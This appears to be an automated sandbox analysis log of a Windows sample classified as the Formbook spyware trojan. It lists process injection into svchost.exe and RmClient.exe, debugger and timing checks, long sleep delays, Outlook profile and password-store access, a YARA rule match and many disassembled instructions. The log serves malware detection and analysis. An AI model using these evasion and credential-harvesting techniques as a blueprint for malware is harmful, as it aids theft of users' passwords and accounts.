            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03063090 NtSetValueKey,6_2_03063090
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062B80 NtQueryInformationFile,6_2_03062B80
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062AB0 NtWaitForSingleObject,6_2_03062AB0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062F60 NtCreateProcessEx,6_2_03062F60
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062F90 NtProtectVirtualMemory,6_2_03062F90
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062FA0 NtQuerySection,6_2_03062FA0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062E30 NtWriteVirtualMemory,6_2_03062E30
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062EA0 NtAdjustPrivilegesToken,6_2_03062EA0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062D00 NtSetInformationFile,6_2_03062D00
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03063D10 NtOpenProcessToken,6_2_03063D10
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03063D70 NtOpenThread,6_2_03063D70
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062DB0 NtEnumerateKey,6_2_03062DB0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062C00 NtQueryInformationProcess,6_2_03062C00
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062CC0 NtQueryVirtualMemory,6_2_03062CC0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062CF0 NtOpenProcess,6_2_03062CF0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_00549080 NtClose,6_2_00549080
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_005491E0 NtAllocateVirtualMemory,6_2_005491E0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_00548D80 NtCreateFile,6_2_00548D80
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_00548EF0 NtReadFile,6_2_00548EF0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_00548FE0 NtDeleteFile,6_2_00548FE0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_00D1F0E9 NtQueryInformationProcess,6_2_00D1F0E9
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_00D1FA38 NtSetContextThread,6_2_00D1FA38
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: String function: 030AEA12 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: String function: 0302B970 appears 248 times
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: String function: 030BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: String function: 03075130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: String function: 03087E54 appears 85 times
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: String function: 0301B970 appears 248 times
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: String function: 03077E54 appears 85 times
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: String function: 0309EA12 appears 84 times
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: String function: 030AF290 appears 103 times
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: String function: 03065130 appears 36 times
            Source: w64HYOhfv1.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe File created: C:\Users\user\AppData\Local\Temp\ambiparous
            Source: w64HYOhfv1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2149425938.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: w64HYOhfv1.exe ReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe File read: C:\Users\user\Desktop\w64HYOhfv1.exe
            Source: unknown Process created: C:\Users\user\Desktop\w64HYOhfv1.exe "C:\Users\user\Desktop\w64HYOhfv1.exe"
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\w64HYOhfv1.exe"
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
            Source: C:\Windows\SysWOW64\RmClient.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe Section loaded: apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, userenv.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\RmClient.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: w64HYOhfv1.exe Static file information: File size 1363343 > 1048576
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000001.00000002.1963873677.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963858433.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129554800.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ifhdPMDeORMlb.exe, 00000003.00000000.1867261425.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp, ifhdPMDeORMlb.exe, 00000007.00000000.2033224305.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.1964073483.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1847224890.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844685675.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.000000000318E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1965904772.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1964009179.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.1964073483.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1847224890.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844685675.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.4130603764.000000000318E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1965904772.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1964009179.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RmClient.exe, 00000006.00000002.4131092895.000000000361C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003BD2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000006.00000002.4131092895.000000000361C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003BD2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000001.00000002.1963873677.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963858433.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129554800.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: w64HYOhfv1.exe Static PE information: real checksum: 0xa961f should be: 0x154296
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RmClient.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030AD1C0 rdtsc 1_2_030AD1C0
            Source: C:\Windows\SysWOW64\RmClient.exe Window / User API: threadDelayed 2301
            Source: C:\Windows\SysWOW64\RmClient.exe Window / User API: threadDelayed 7671
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\RmClient.exe API coverage: 3.1 %
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 6288 Thread sleep count: 2301 > 30
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 6288 Thread sleep time: -4602000s >= -30000s
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 6288 Thread sleep count: 7671 > 30
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 6288 Thread sleep time: -15342000s >= -30000s
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764 Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764 Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764 Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764 Thread sleep count: 41 > 30
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764 Thread sleep time: -41000s >= -30000s
            Source: C:\Windows\SysWOW64\RmClient.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\RmClient.exe Code function: 6_2_0053C280 FindFirstFileW,FindNextFileW,FindClose,6_2_0053C280
            Source: ifhdPMDeORMlb.exe, 00000007.00000002.4129953313.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
            Source: firefox.exe, 00000008.00000002.2263936410.00000247FBD7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\RmClient.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02677583 LdrLoadDll,1_2_02677583
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EB256 mov eax, dword ptr fs:[00000030h]1_2_030EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EB256 mov eax, dword ptr fs:[00000030h]1_2_030EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]1_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FD26B mov eax, dword ptr fs:[00000030h]1_2_030FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FD26B mov eax, dword ptr fs:[00000030h]1_2_030FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]1_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03059274 mov eax, dword ptr fs:[00000030h]1_2_03059274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03071270 mov eax, dword ptr fs:[00000030h]1_2_03071270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03071270 mov eax, dword ptr fs:[00000030h]1_2_03071270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03105283 mov eax, dword ptr fs:[00000030h]1_2_03105283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306329E mov eax, dword ptr fs:[00000030h]1_2_0306329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306329E mov eax, dword ptr fs:[00000030h]1_2_0306329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]1_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]1_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]1_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]1_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C72A0 mov eax, dword ptr fs:[00000030h]1_2_030C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C72A0 mov eax, dword ptr fs:[00000030h]1_2_030C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B92BC mov eax, dword ptr fs:[00000030h]1_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B92BC mov eax, dword ptr fs:[00000030h]1_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B92BC mov ecx, dword ptr fs:[00000030h]1_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B92BC mov ecx, dword ptr fs:[00000030h]1_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030392C5 mov eax, dword ptr fs:[00000030h]1_2_030392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030392C5 mov eax, dword ptr fs:[00000030h]1_2_030392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B2D3 mov eax, dword ptr fs:[00000030h]1_2_0302B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B2D3 mov eax, dword ptr fs:[00000030h]1_2_0302B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B2D3 mov eax, dword ptr fs:[00000030h]1_2_0302B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305F2D0 mov eax, dword ptr fs:[00000030h]1_2_0305F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305F2D0 mov eax, dword ptr fs:[00000030h]1_2_0305F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031052E2 mov eax, dword ptr fs:[00000030h]1_2_031052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF2F8 mov eax, dword ptr fs:[00000030h]1_2_030EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030292FF mov eax, dword ptr fs:[00000030h]1_2_030292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]1_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]1_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03031131 mov eax, dword ptr fs:[00000030h]1_2_03031131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03031131 mov eax, dword ptr fs:[00000030h]1_2_03031131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]1_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]1_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]1_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]1_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03105152 mov eax, dword ptr fs:[00000030h]1_2_03105152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
